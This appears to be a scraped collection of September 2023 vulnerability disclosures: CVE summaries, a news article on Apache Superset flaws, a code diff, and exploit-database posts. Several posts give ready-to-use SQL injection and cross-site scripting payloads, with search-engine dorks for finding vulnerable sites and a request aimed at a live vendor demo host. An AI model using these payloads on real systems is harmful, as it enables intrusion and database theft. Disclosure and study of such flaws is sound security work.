A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination.

**ENHANCE YOUR BUSINESS AND UNLOCK YOUR FULLEST **POTENTIAL** **CAPABILITY** **EFFICIENCY** **PROFICIENCY** **EFFECTIVENESS****

Enhancesoft’s software products focus on helping clients embrace and take advantage of innovative new technologies while maximizing the existing infrastructure. We work with our clients to plan, design, engineer, implement, and integrate software and applications that are reliable, manageable, scalable, and custom-tailored to meet today’s challenges.

**Don’t let the changing business conditions and technology sideline your ultimate goals.**

**Who are we? What do we do?**

Enhancesoft is a diverse team of professionals who are passionate about making happy customers. With osTicket and SupportSystem, we’ve created quality, easy to use customer support platforms designed to help businesses thrive.

**What our clients say about us**

Great customer support! Their team was very knowledgeable and helped solved my issues fast! Thank you very much!

Their SupportSystem software is just amazing. We found it easy-to-use and very effective way to maintain our customer support. This tool is worth every penny!

Many thanks for all your help and for looking after us in the excellent way that you do. Enhancesoft have been efficient and proactive, particularly in meeting deadlines and their added value support on commercial issues.

**Want to know when we got news on our latest product? **Sign up for our newsletter now!****

CVE-2021-45811: Enhancesoft – Enhance Your Business Today

JPC2 CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================================================================| # Title     : JPC2 CMS v1.0 Sql injection Vulnerability                                                                            || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              || # Vendor    : https://www.facebook.com/JPC2GroupWeb                                                                                |  | # Dork      : "Web design and development JPC2 Group Web"                                                                          |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  inject here : http://127.0.0.1/wwwnpmlexcom/en/pagina.php?idcate=13[+]  Panel       : http://127.0.0.1/wwwnpmlexcom/en/administrador/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

JPC2 CMS 1.0 SQL Injection

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

**Izdelava IDS 2.0 Cross Site Scripting**

Posted Sep 7, 2023

Authored by indoushka

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 0ef798585da30c6f8445d7bd8186a6b3603ee0ca8ce5383bd27b385d754bf05c

Download | Favorite | View

**Izdelava IDS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Izdelava IDS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://studiointera.net                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script>[+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,139)
*   Arbitrary (16,235)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,289)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,499)
*   Encryption (2,370)
*   Exploit (52,056)
*   File Inclusion (4,227)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,791)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (859)
*   Kernel (6,717)
*   Local (14,491)
*   Magazine (586)
*   Overflow (12,701)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,604)
*   Python (1,535)
*   Remote (30,843)
*   Root (3,588)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,893)
*   Shell (3,192)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,208)
*   SQL Injection (16,403)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,811)
*   Web (9,691)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,988)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,828)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,638)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,823)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,885)
*   UNIX (9,305)
*   UnixWare (186)
*   Windows (6,582)
*   Other

Izdelava IDS 2.0 Cross Site Scripting

Meeting Room Booking System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Title: Meeting Room Booking System-1.0 Multiple - SQLi## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The column parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the column parameter, and adatabase error message was returned. The attacker easily can steal allinformation from the database of this web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: column (GET)    Type: error-based    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASEWHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)## Time spent:01:47:00

Meeting Room Booking System 1.0 SQL Injection

A vulnerability in RDPngFileUpload.dll, as used in the IRM Next Generation booking system, allows a remote attacker to upload arbitrary content (such as a web shell component) to the SQL database and execute it with SYSTEM privileges. This vulnerability requires authentication to be exploited but can be paired with another vulnerability in the platform (CVE-2023-39420, which grants access to hardcoded credentials) to carry the attack without having assigned credentials. 

CVE-2023-39424

Patches have been released to address two new security vulnerabilities in Apache SuperSet that could be exploited by an attacker to gain remote code execution on affected systems.
The update (version 2.1.1) plugs CVE-2023-39265 and CVE-2023-37941, which make it possible to conduct nefarious actions once a bad actor is able to gain control of Superset’s metadata database.
Outside of these

Server Security / Vulnerability

Patches have been released to address two new security vulnerabilities in **Apache SuperSe**t that could be exploited by an attacker to gain remote code execution on affected systems.

The update (version 2.1.1) plugs CVE-2023-39265 and CVE-2023-37941, which make it possible to conduct nefarious actions once a bad actor is able to gain control of Superset's metadata database.

Outside of these weaknesses, the latest version of Superset also remediates a separate improper REST API permission issue (CVE-2023-36388) that allows for low-privilege users to carry out server-side request forgery (SSRF) attacks.

"Superset by design allows privileged users to connect to arbitrary databases and execute arbitrary SQL queries against those databases using the powerful SQLLab interface," Horizon3.ai's Naveen Sunkavally said in a technical write-up.

"If Superset can be tricked into connecting to its own metadata database, an attacker can directly read or write application configuration through SQLLab. This leads to harvesting credentials and remote code execution."

CVE-2023-39265 relates to a case of URI bypass when connecting to the SQLite database used for the metastore, enabling an attacker to execute data manipulation commands.

Also tracked as part of the same CVE identifier is the lack of validation when importing SQLite database connection information from a file, which could be abused to import a maliciously crafted ZIP archive file.

"Superset versions from 1.5 to 2.1.0 use python's pickle package to store certain configuration data," Sunkavally said about CVE-2023-37941.

"An attacker with write access to the metadata database can insert an arbitrary pickle payload into the store, and then trigger deserialization of it, leading to remote code execution."

Some of the other flaws that have been patched in the latest release are below -

*   An MySQL arbitrary file read vulnerability that could be exploited to get credentials to the metadata database
*   The abuse of superset load\_examples command to get the metadata database URI from the user interface and modify data stored in it
*   The use of default credentials to access the metadata database in some installations of Superset
*   The leak of database credentials in plaintext when querying the /api/v1/database API as a privileged user (CVE-2023-30776, fixed in 2.1.0)

The disclosure comes a little over four months after the company disclosed a high-severity flaw in the same product (CVE-2023-27524, CVSS score: 8.9) that could enable unauthorized attackers to gain admin access to the servers and execute arbitrary code.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

The problem arises as a result of using a default SECRET\_KEY that could be abused by attackers to authenticate and access unauthorized resources on internet-exposed installations.

Since the public disclosure of the flaw in April 2023, Horizon3.ai said 2076 out of 3842 Superset servers are still using a default SECRET\_KEY, with about 72 instances using a trivially guessable SECRET\_KEY like superset, SUPERSET\_SECRET\_KEY, 1234567890, admin, changeme, thisisasecretkey, and your\_secret\_key\_here.

"The user is responsible for setting the Flask SECRET\_KEY, which invariably leads to some users setting weak keys," Sunkavally said, urging the maintainers to add support for automatically generating the key.

"At the root of many of the vulnerabilities \[...\] is the fact that the Superset web interface permits users to connect to the metadata database. At the root of many of the vulnerabilities in this post is the fact that the Superset web interface permits users to connect to the metadata database."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Alert: Apache SuperSet Vulnerabilities Expose Servers to Remote Code Execution Attacks

Missing Authentication for Critical Function in GitHub repository answerdev/answer prior to v1.1.3.

Expand Up @@ -55,7 +55,6 @@ func (ar \*AnswerActivityRepo) SaveAcceptAnswerActivity(ctx context.Context, op \* return nil }  
ar.data.DB.ShowSQL(true) // save activity \_, err \= ar.data.DB.Transaction(func(session \*xorm.Session) (result any, err error) { session \= session.Context(ctx) Expand Down Expand Up @@ -311,12 +310,11 @@ func (ar \*AnswerActivityRepo) sendAcceptAnswerNotification( Type: schema.NotificationTypeAchievement, ObjectID: op.AnswerObjectID, ReceiverUserID: act.ActivityUserID, TriggerUserID: act.TriggerUserID, } if act.ActivityUserID \== op.QuestionUserID { msg.TriggerUserID \= op.AnswerUserID msg.ObjectType \= constant.AnswerObjectType } else { msg.TriggerUserID \= op.QuestionUserID msg.ObjectType \= constant.AnswerObjectType } if msg.TriggerUserID != msg.ReceiverUserID { Expand All @@ -329,9 +327,9 @@ func (ar \*AnswerActivityRepo) sendAcceptAnswerNotification( ReceiverUserID: act.ActivityUserID, Type: schema.NotificationTypeInbox, ObjectID: op.AnswerObjectID, TriggerUserID: op.TriggerUserID, } if act.ActivityUserID != op.QuestionUserID { msg.TriggerUserID \= op.QuestionUserID msg.ObjectType \= constant.AnswerObjectType msg.NotificationAction \= constant.NotificationAcceptAnswer ar.notificationQueueService.Send(ctx, msg) Expand All @@ -343,15 +341,14 @@ func (ar \*AnswerActivityRepo) sendCancelAcceptAnswerNotification( ctx context.Context, op \*schema.AcceptAnswerOperationInfo) { for \_, act := range op.Activities { msg := &schema.NotificationMsg{ TriggerUserID: act.TriggerUserID, ReceiverUserID: act.ActivityUserID, Type: schema.NotificationTypeAchievement, ObjectID: op.AnswerObjectID, } if act.ActivityUserID \== op.QuestionObjectID { msg.TriggerUserID \= op.AnswerObjectID msg.ObjectType \= constant.QuestionObjectType } else { msg.TriggerUserID \= op.QuestionObjectID msg.ObjectType \= constant.AnswerObjectType } if msg.TriggerUserID != msg.ReceiverUserID { Expand Down

CVE-2023-4815: fix(answer): fix incorrect notification's triggerUserID when cancel a… · answerdev/answer@e75142a

The Duplicate Post Page Menu & Custom Post Type plugin for WordPress is vulnerable to unauthorized page and post duplication due to a missing capability check on the duplicate_ppmc_post_as_draft function in versions up to, and including, 2.3.1. This makes it possible for authenticated attackers with subscriber access or higher to duplicate posts and pages.

CVE-2023-4792: duplicate-post-page-menu-cpt.php in duplicate-post-page-menu-custom-post-type/trunk – WordPress Plugin Repository

Frappe is a low code web framework written in Python and Javascript. A SQL Injection vulnerability has been identified in the Frappe Framework which could allow a malicious actor to access sensitive information. This issue has been addressed in versions 13.46.1 and 14.20.0. Users are advised to upgrade. There's no workaround to fix this without upgrading.

Moderate

ankush published GHSA-53wh-f67g-9679

Sep 6, 2023

**Package**

frappe

**Affected versions**

< 13.46.1

<14.20.0

**Patched versions**

13.46.1

14.20.0

**Description**

**Impact**

A SQL Injection vulnerability has been identified in the Frappe Framework which could allow a malicious actor to access sensitive information.

**Workarounds**

There's no workaround to fix this without upgrading

**Severity**

Moderate

4.2

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

High

Privileges required

Low

User interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

Low

Availability

None

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

**CVE ID**

CVE-2023-41328

**Weaknesses**

CWE-89

**Credits**

*    sagarvora Analyst
*    ankush Remediation reviewer

CVE-2023-41328: Possibility limited SQL injection due to insufficient validation

Cinema Booking System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Cinema Booking System-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/05/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/car-rental-script/## Reference: https://portswigger.net/web-security/sql-injection## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks. The payload kfimq"><script>alert(1)</script>k0a57 wassubmitted in the name of an arbitrarily supplied URL parameter. Thisinput was echoed unmodified in the application's response. Theattacker can trick all users of this system into visiting a veryDANGEROUS URL address, and the worst thing is when they try to log into this system, by using his malicious link!STATUS: HIGH-CRITICAL Vulnerability[+]Testing Payload:```GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLoginHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)## Time spent:00:17:00

Tag

#sql